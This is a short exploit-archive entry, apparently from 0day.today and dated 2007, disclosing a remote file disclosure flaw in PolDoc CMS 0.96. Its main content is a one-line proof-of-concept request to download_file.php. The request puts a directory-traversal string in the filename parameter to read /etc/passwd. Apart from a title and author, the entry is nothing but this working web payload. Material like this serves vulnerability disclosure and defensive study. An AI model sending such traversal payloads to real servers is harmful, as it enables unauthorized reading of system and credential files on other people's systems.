id: 2344
date: 12/08/2007
title: PolDoc CMS 0.96 (download_file.php) File Disclosure Vulnerability
author: GoLd_M
cves: 

=================================================================
PolDoc CMS 0.96 (download_file.php) File Disclosure Vulnerability
=================================================================



PolDoc CMS 0.96 (download_file.php filename) Remote File Disclosure Vulnerability

POC : /download_file.php?filename=../../../../../../../../etc/passwd



#  0day.today [2023-03-27]  #